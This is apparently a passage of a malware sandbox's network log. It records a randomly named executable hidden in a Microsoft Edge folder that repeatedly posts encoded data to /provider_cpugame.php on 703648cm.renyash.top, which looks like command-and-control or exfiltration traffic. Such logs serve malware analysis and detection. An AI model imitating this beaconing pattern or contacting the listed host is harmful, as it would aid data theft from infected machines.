                                                                                                                      Data Ascii: ]]ZTX\T_Z[[RU^Q]XYYIRST\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=X3]=:'=)9;]4:)'[$9(3Q%<Z#!2$#G!"^,
                                                                                                                      Dec 20, 2024 21:18:38.267649889 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:38.501029015 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.44986437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:38.749667883 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:39.098222971 CET2644OUTData Raw: 5d 5a 5f 56 58 5b 51 50 5a 5b 5b 52 55 5e 51 53 58 59 59 48 52 55 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]Z_VX[QPZ[[RU^QSXYYHRUT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A)-#*:&-69.4*)+\%8*<1#2'!1!W0>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:40.019987106 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:40.252810955 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.2.44986837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:40.500386000 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:40.848577976 CET2644OUTData Raw: 58 5a 5f 52 58 5e 54 55 5a 5b 5b 52 55 50 51 56 58 59 59 40 52 54 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XZ_RX^TUZ[[RUPQVXYY@RTT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=>+=9X'.":]9#\9*4]$5?Q&;$!*'#G!"^,
                                                                                                                      Dec 20, 2024 21:18:41.819082975 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:42.052251101 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:40 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      42192.168.2.44987237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:42.295491934 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:42.645009041 CET2644OUTData Raw: 58 5f 5f 5e 5d 5b 54 51 5a 5b 5b 52 55 55 51 57 58 59 59 45 52 52 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X__^][TQZ[[RUUQWXYYERRT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B)X/]>%$=.]&49.X)4$^!*!02'#19$>#G!"^,/
                                                                                                                      Dec 20, 2024 21:18:43.565392017 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:43.804444075 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:41 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      43192.168.2.44987837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:44.044912100 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:44.394951105 CET2644OUTData Raw: 5d 5b 5f 55 5d 5c 51 55 5a 5b 5b 52 55 54 51 50 58 5a 59 46 52 56 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_U]\QUZ[[RUTQPXZYFRVTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"*X+)!Z&-!9;4&X(4,$(=T?,'+?5*'#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:45.318016052 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:45.552259922 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.44988437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:45.796358109 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:46.144993067 CET2644OUTData Raw: 58 59 5f 55 5d 5b 54 51 5a 5b 5b 52 55 55 51 54 58 5c 59 45 52 50 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_U][TQZ[[RUUQTX\YERPT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">+\? :$-!9 >Z>$;Y%85(T3'+<\!!&.#G!"^,/
                                                                                                                      Dec 20, 2024 21:18:47.066512108 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:47.300102949 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.44988937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:47.544636965 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:47.894881010 CET2644OUTData Raw: 58 58 5f 56 5d 5f 54 52 5a 5b 5b 52 55 5f 51 54 58 5d 59 40 52 5d 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_V]_TRZ[[RU_QTX]Y@R]T\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!><>)[0=98)#1=4'$;%<#T%;$X55S3#G!"^,
                                                                                                                      Dec 20, 2024 21:18:48.815921068 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:49.048188925 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.44989337.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:49.295562029 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:49.645193100 CET2644OUTData Raw: 5d 5b 5a 57 58 5a 54 5e 5a 5b 5b 52 55 5e 51 52 58 53 59 42 52 50 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][ZWXZT^Z[[RU^QRXSYBRPTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G+>Y?#2$!-1!*=$;0;9V*!#&/6='.#G!"^,
                                                                                                                      Dec 20, 2024 21:18:50.565597057 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:50.804681063 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.44989737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:51.044424057 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:51.395019054 CET2644OUTData Raw: 58 59 5f 54 5d 58 54 51 5a 5b 5b 52 55 5e 51 56 58 5c 59 40 52 57 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_T]XTQZ[[RU^QVX\Y@RWT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!).+>0*\9;67X)B$3%(& Y6!3>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:52.325829983 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:52.561688900 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.44990337.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:52.815419912 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:53.160545111 CET2644OUTData Raw: 58 58 5f 52 58 5a 54 52 5a 5b 5b 52 55 54 51 50 58 5e 59 44 52 53 54 59 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_RXZTRZ[[RUTQPX^YDRSTY][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")?[>#3.,8&!*:)4;Z'6?"3%8 \"W)3>#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:54.085952044 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:54.324384928 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:52 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.44991037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:54.579925060 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:54.926150084 CET2644OUTData Raw: 58 5e 5a 54 5d 56 51 57 5a 5b 5b 52 55 5f 51 56 58 53 59 45 52 52 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X^ZT]VQWZ[[RU_QVXSYERRT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@>+*323-%-]7>>';['(>(2'U&;!"&&>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:55.849172115 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:56.084470987 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      50192.168.2.44991537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:56.324529886 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:56.676212072 CET2644OUTData Raw: 5d 5d 5a 53 5d 5e 51 50 5a 5b 5b 52 55 53 51 54 58 59 59 48 52 51 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]]ZS]^QPZ[[RUSQTXYYHRQTT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!>.3>3]'&Y9+7\.)443^%T(T?V1'51R$#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:57.596350908 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:57.832025051 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      51192.168.2.44991937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:58.076692104 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:58.426268101 CET2644OUTData Raw: 58 5f 5a 54 5d 5c 54 54 5a 5b 5b 52 55 5e 51 56 58 5a 59 48 52 56 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X_ZT]\TTZ[[RU^QVXZYHRVTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G=)10-]%7\9='?X0;)W+21;?525W'#G!"^,
                                                                                                                      Dec 20, 2024 21:18:59.348875999 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:59.584338903 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.44992237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:59.842746973 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:00.191848040 CET2644OUTData Raw: 58 5b 5f 50 58 5d 51 50 5a 5b 5b 52 55 52 51 53 58 5d 59 41 52 57 54 59 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X[_PX]QPZ[[RURQSX]YARWTY][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=>0)*'9.8*79&X*$(%+**"+W2(,5=3#G!"^,3
                                                                                                                      Dec 20, 2024 21:19:01.117680073 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:01.356400013 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
